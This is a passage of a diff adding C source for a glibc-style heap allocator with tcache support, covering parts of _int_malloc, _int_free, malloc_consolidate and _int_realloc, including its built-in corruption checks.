+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp = *fb;
+      REMOVE_FB (fb, victim, pp);
+      if (victim != 0)
+        {
+          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
+            {
+              errstr = "malloc(): memory corruption (fast)";
+            errout:
+              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
+              return NULL;
+            }
+          check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (pp = *fb) != NULL)
+		{
+		  REMOVE_FB (fb, tc_victim, pp);
+		  if (tc_victim != 0)
+		    {
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          if (victim == 0) /* initialization check */
+            malloc_consolidate (av);
+          else
+            {
+              bck = victim->bk;
+	if (__glibc_unlikely (bck->fd != victim))
+                {
+                  errstr = "malloc(): smallbin double linked list corrupted";
+                  goto errout;
+                }
+              set_inuse_bit_at_offset (victim, nb);
+              bin->bk = bck;
+              bck->fd = bin;
+
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+              check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (have_fastchunks (av))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr (check_action, "malloc(): memory corruption",
+                             chunk2mem (victim), av);
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+	  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+	  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks 2";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (have_fastchunks (av))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  const char *errstr = NULL;
+  int locked = 0;
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    {
+      errstr = "free(): invalid pointer";
+    errout:
+      if (!have_lock && locked)
+        __libc_lock_unlock (av->mutex);
+      malloc_printerr (check_action, errstr, chunk2mem (p), av);
+      return;
+    }
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    {
+      errstr = "free(): invalid size";
+      goto errout;
+    }
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+
+    if (tcache
+	&& tc_idx < mp_.tcache_bins
+	&& tcache->counts[tc_idx] < mp_.tcache_count)
+      {
+	tcache_put (p, tc_idx);
+	return;
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might have let to a false positive.  Redo the test
+	   after getting the lock.  */
+	if (have_lock
+	    || ({ assert (locked == 0);
+		  __libc_lock_lock (av->mutex);
+		  locked = 1;
+		  chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
+	      }))
+	  {
+	    errstr = "free(): invalid next size (fast)";
+	    goto errout;
+	  }
+	if (! have_lock)
+	  {
+	    __libc_lock_unlock (av->mutex);
+	    locked = 0;
+	  }
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    set_fastchunks(av);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+    unsigned int old_idx = ~0u;
+    do
+      {
+	/* Check that the top of the bin is not the record we are going to add
+	   (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  {
+	    errstr = "double free or corruption (fasttop)";
+	    goto errout;
+	  }
+	/* Check that size of fastbin chunk at the top is the same as
+	   size of the chunk that we are adding.  We can dereference OLD
+	   only if we have the lock, otherwise it might have already been
+	   deallocated.  See use of OLD_IDX below for the actual check.  */
+	if (have_lock && old != NULL)
+	  old_idx = fastbin_index(chunksize(old));
+	p->fd = old2 = old;
+      }
+    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
+
+    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
+      {
+	errstr = "invalid fastbin entry (free)";
+	goto errout;
+      }
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+    if (! have_lock) {
+      __libc_lock_lock (av->mutex);
+      locked = 1;
+    }
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      {
+	errstr = "double free or corruption (top)";
+	goto errout;
+      }
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+      {
+	errstr = "double free or corruption (out)";
+	goto errout;
+      }
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      {
+	errstr = "double free or corruption (!prev)";
+	goto errout;
+      }
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      {
+	errstr = "free(): invalid next size (normal)";
+	goto errout;
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	{
+	  errstr = "free(): corrupted unsorted chunks";
+	  goto errout;
+	}
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (have_fastchunks(av))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (! have_lock) {
+      assert (locked);
+      __libc_lock_unlock (av->mutex);
+    }
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+
+  Also, because this routine needs to be called the first time through
+  malloc anyway, it turns out to be the perfect place to trigger
+  initialization code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  /*
+    If max_fast is 0, we know that av hasn't
+    yet been initialized, in which case do so below
+  */
+
+  if (get_max_fast () != 0) {
+    clear_fastchunks(av);
+
+    unsorted_bin = unsorted_chunks(av);
+
+    /*
+      Remove each chunk from fast bin and consolidate it, placing it
+      then in unsorted bin. Among other reasons for doing this,
+      placing in unsorted bin avoids needing to calculate actual bins
+      until malloc is sure that chunks aren't immediately going to be
+      reused anyway.
+    */
+
+    maxfb = &fastbin (av, NFASTBINS - 1);
+    fb = &fastbin (av, 0);
+    do {
+      p = atomic_exchange_acq (fb, NULL);
+      if (p != 0) {
+	do {
+	  check_inuse_chunk(av, p);
+	  nextp = p->fd;
+
+	  /* Slightly streamlined version of consolidation code in free() */
+	  size = chunksize (p);
+	  nextchunk = chunk_at_offset(p, size);
+	  nextsize = chunksize(nextchunk);
+
+	  if (!prev_inuse(p)) {
+	    prevsize = prev_size (p);
+	    size += prevsize;
+	    p = chunk_at_offset(p, -((long) prevsize));
+	    unlink(av, p, bck, fwd);
+	  }
+
+	  if (nextchunk != av->top) {
+	    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	    if (!nextinuse) {
+	      size += nextsize;
+	      unlink(av, nextchunk, bck, fwd);
+	    } else
+	      clear_inuse_bit_at_offset(nextchunk, 0);
+
+	    first_unsorted = unsorted_bin->fd;
+	    unsorted_bin->fd = p;
+	    first_unsorted->bk = p;
+
+	    if (!in_smallbin_range (size)) {
+	      p->fd_nextsize = NULL;
+	      p->bk_nextsize = NULL;
+	    }
+
+	    set_head(p, size | PREV_INUSE);
+	    p->bk = unsorted_bin;
+	    p->fd = first_unsorted;
+	    set_foot(p, size);
+	  }
+
+	  else {
+	    size += nextsize;
+	    set_head(p, size | PREV_INUSE);
+	    av->top = p;
+	  }
+
+	} while ( (p = nextp) != 0);
+
+      }
+    } while (fb++ != maxfb);
+  }
+  else {
+    malloc_init_state(av);
+    check_malloc_state(av);
+  }
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  const char *errstr = NULL;
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid old size";
+    errout:
+      malloc_printerr (check_action, errstr, chunk2mem (oldp), av);
+      return NULL;
+    }
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid next size";
+      goto errout;
+    }
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
